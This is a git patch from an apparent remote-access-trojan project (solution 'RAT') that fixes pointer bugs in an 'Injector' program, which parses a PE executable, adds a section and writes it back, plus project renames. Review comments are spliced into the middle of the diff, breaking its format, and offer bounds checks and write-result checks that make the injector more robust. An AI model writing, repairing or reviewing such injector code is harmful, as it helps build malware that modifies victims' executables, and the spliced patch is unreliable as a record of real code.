From 89dbd15250787f10ec66dbd39b4f19ad1f56849d Mon Sep 17 00:00:00 2001
From: hellisabove <59116609+hellisabove@users.noreply.github.com>
Date: Mon, 3 Jul 2023 03:05:34 +0300
Subject: [PATCH] Fixed Some Stuff
---
 FunDLL/{RAT.vcxproj => FunDLL.vcxproj} | 0
 ...vcxproj.filters => FunDLL.vcxproj.filters} | 0
 .../{RAT.vcxproj.user => FunDLL.vcxproj.user} | 0
 Injector/Source.cpp | 11 ++++++----
 RAT.sln | 20 +++++++++----------
 5 files changed, 17 insertions(+), 14 deletions(-)
 rename FunDLL/{RAT.vcxproj => FunDLL.vcxproj} (100%)
 rename FunDLL/{RAT.vcxproj.filters => FunDLL.vcxproj.filters} (100%)
 rename FunDLL/{RAT.vcxproj.user => FunDLL.vcxproj.user} (100%)
diff --git a/FunDLL/RAT.vcxproj b/FunDLL/FunDLL.vcxproj
similarity index 100%
rename from FunDLL/RAT.vcxproj
rename to FunDLL/FunDLL.vcxproj
diff --git a/FunDLL/RAT.vcxproj.filters b/FunDLL/FunDLL.vcxproj.filters
similarity index 100%
rename from FunDLL/RAT.vcxproj.filters
rename to FunDLL/FunDLL.vcxproj.filters
diff --git a/FunDLL/RAT.vcxproj.user b/FunDLL/FunDLL.vcxproj.user
similarity index 100%
rename from FunDLL/RAT.vcxproj.user
rename to FunDLL/FunDLL.vcxproj.user
diff --git a/Injector/Source.cpp b/Injector/Source.cpp
index d5a449b..0855b1c 100644
--- a/Injector/Source.cpp
+++ b/Injector/Source.cpp
@@ -23,11 +23,11 @@ INT main(INT arg, PCHAR argv[]) {
 BOOL file_read = ReadFile(x_file, file_buffer, file_size, &returned_bytes, NULL);
 if (file_read == TRUE && returned_bytes == file_size) {
- PIMAGE_DOS_HEADER image_dos_header = (PIMAGE_DOS_HEADER)file_read;
+ PIMAGE_DOS_HEADER image_dos_header = (PIMAGE_DOS_HEADER)file_buffer;
 if (image_dos_header->e_magic == IMAGE_DOS_SIGNATURE) { // if PE valid
- PIMAGE_FILE_HEADER image_file_header = (PIMAGE_FILE_HEADER)(file_read + image_dos_header->e_lfanew + sizeof(DWORD));
- PIMAGE_OPTIONAL_HEADER image_optional_header = (PIMAGE_OPTIONAL_HEADER) (file_read + image_dos_header->e_lfanew + sizeof(DWORD) + sizeof(IMAGE_FILE_HEADER));
- PIMAGE_SECTION_HEADER image_section_header = (PIMAGE_SECTION_HEADER) (file_read + image_dos_header->e_lfanew + sizeof(IMAGE_NT_HEADERS));
+ PIMAGE_FILE_HEADER image_file_header = (PIMAGE_FILE_HEADER)(file_buffer + image_dos_header->e_lfanew + sizeof(DWORD));
+ PIMAGE_OPTIONAL_HEADER image_optional_header = (PIMAGE_OPTIONAL_HEADER) (file_buffer + image_dos_header->e_lfanew + sizeof(DWORD) + sizeof(IMAGE_FILE_HEADER));
+ PIMAGE_SECTION_HEADER image_section_header = (PIMAGE_SECTION_HEADER) (file_buffer + image_dos_header->e_lfanew + sizeof(IMAGE_NT_HEADERS));
 WORD PESections = image_file_header->NumberOfSections;
 ZeroMemory(&image_section_header[PESections], sizeof(IMAGE_SECTION_HEADER));
@@ -61,6 +61,9 @@ INT main(INT arg, PCHAR argv[]) {
 // add section
 WriteFile(x_file, file_buffer, file_size, &returned_bytes, NULL);
 }
+
+ // add file
+ WriteFile(x_file, file_buffer, file_size, &returned_bytes, NULL);
 }
 }
 LocalFree(dll_buffer);
diff --git a/RAT.sln b/RAT.sln
index b3ef064..6847389 100644
--- a/RAT.sln
+++ b/RAT.sln
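Review bot: `e_lfanew` comes straight from the file and is added to `file_buffer` without a bounds check, so the three header pointers and the `ZeroMemory(&image_section_header[PESections], ...)` write can fall outside the `file_size`-byte buffer when the input is truncated or malformed. Before the casts, the code should require `file_size >= sizeof(IMAGE_DOS_HEADER)`, reject a negative `e_lfanew`, and check that `e_lfanew + sizeof(IMAGE_NT_HEADERS) + (PESections + 1) * sizeof(IMAGE_SECTION_HEADER) <= file_size`. The `// if PE valid` comment overstates the test, since `e_magic` only proves an MZ stub; comparing the NT signature with `IMAGE_NT_SIGNATURE` would make the comment true. main's body starts and ends outside the hunk, and the declaration of `file_buffer` is not visible here, so the pointer arithmetic is presumably byte-wise.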
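Review bot: The `WriteFile` call added under `// add file` is identical to the one under `// add section` just above it, so on the path that enters the inner block the same buffer is written to `x_file` twice. Neither call checks its result; because this appears to write back to the handle the input was read from, a failed or partial write would silently leave a damaged file. Test the result, for example `if (!WriteFile(x_file, file_buffer, file_size, &returned_bytes, NULL) || returned_bytes != file_size)` followed by an error report and an early exit. The comment should say why a second write is needed, e.g. `// write the buffer when no section was added`, if that is the intent. The enclosing blocks open outside the hunk, so the condition guarding the inner write is not visible.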
@@ -3,10 +3,10 @@ Microsoft Visual Studio Solution File, Format Version 12.00
 # Visual Studio Version 17
 VisualStudioVersion = 17.6.33815.320
 MinimumVisualStudioVersion = 10.0.40219.1
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "FunDLL", "RAT\RAT.vcxproj", "{C7E129B4-8A7E-4E5C-A259-573609675FED}"
-EndProject
 Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Injector", "Injector\Injector.vcxproj", "{9C556697-73D5-47E2-908C-B285CB253CC6}"
 EndProject
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "FunDLL", "FunDLL\FunDLL.vcxproj", "{C7E129B4-8A7E-4E5C-A259-573609675FED}"
+EndProject
 Global
 GlobalSection(SolutionConfigurationPlatforms) = preSolution
 Debug|x64 = Debug|x64
@@ -15,14 +15,6 @@ Global
 Release|x86 = Release|x86
 EndGlobalSection
 GlobalSection(ProjectConfigurationPlatforms) = postSolution
- {C7E129B4-8A7E-4E5C-A259-573609675FED}.Debug|x64.ActiveCfg = Debug|x64
- {C7E129B4-8A7E-4E5C-A259-573609675FED}.Debug|x64.Build.0 = Debug|x64
- {C7E129B4-8A7E-4E5C-A259-573609675FED}.Debug|x86.ActiveCfg = Debug|Win32
- {C7E129B4-8A7E-4E5C-A259-573609675FED}.Debug|x86.Build.0 = Debug|Win32
- {C7E129B4-8A7E-4E5C-A259-573609675FED}.Release|x64.ActiveCfg = Release|x64
- {C7E129B4-8A7E-4E5C-A259-573609675FED}.Release|x64.Build.0 = Release|x64
- {C7E129B4-8A7E-4E5C-A259-573609675FED}.Release|x86.ActiveCfg = Release|Win32
- {C7E129B4-8A7E-4E5C-A259-573609675FED}.Release|x86.Build.0 = Release|Win32
 {9C556697-73D5-47E2-908C-B285CB253CC6}.Debug|x64.ActiveCfg = Debug|x64
 {9C556697-73D5-47E2-908C-B285CB253CC6}.Debug|x64.Build.0 = Debug|x64
 {9C556697-73D5-47E2-908C-B285CB253CC6}.Debug|x86.ActiveCfg = Debug|Win32
@@ -31,6 +23,14 @@ Global
 {9C556697-73D5-47E2-908C-B285CB253CC6}.Release|x64.Build.0 = Release|x64
 {9C556697-73D5-47E2-908C-B285CB253CC6}.Release|x86.ActiveCfg = Release|Win32
 {9C556697-73D5-47E2-908C-B285CB253CC6}.Release|x86.Build.0 = Release|Win32
+ {C7E129B4-8A7E-4E5C-A259-573609675FED}.Debug|x64.ActiveCfg = Debug|x64
+ {C7E129B4-8A7E-4E5C-A259-573609675FED}.Debug|x64.Build.0 = Debug|x64
+ {C7E129B4-8A7E-4E5C-A259-573609675FED}.Debug|x86.ActiveCfg = Debug|Win32
+ {C7E129B4-8A7E-4E5C-A259-573609675FED}.Debug|x86.Build.0 = Debug|Win32
+ {C7E129B4-8A7E-4E5C-A259-573609675FED}.Release|x64.ActiveCfg = Release|x64
+ {C7E129B4-8A7E-4E5C-A259-573609675FED}.Release|x64.Build.0 = Release|x64
+ {C7E129B4-8A7E-4E5C-A259-573609675FED}.Release|x86.ActiveCfg = Release|Win32
+ {C7E129B4-8A7E-4E5C-A259-573609675FED}.Release|x86.Build.0 = Release|Win32
 EndGlobalSection
 GlobalSection(SolutionProperties) = preSolution
 HideSolutionNode = FALSE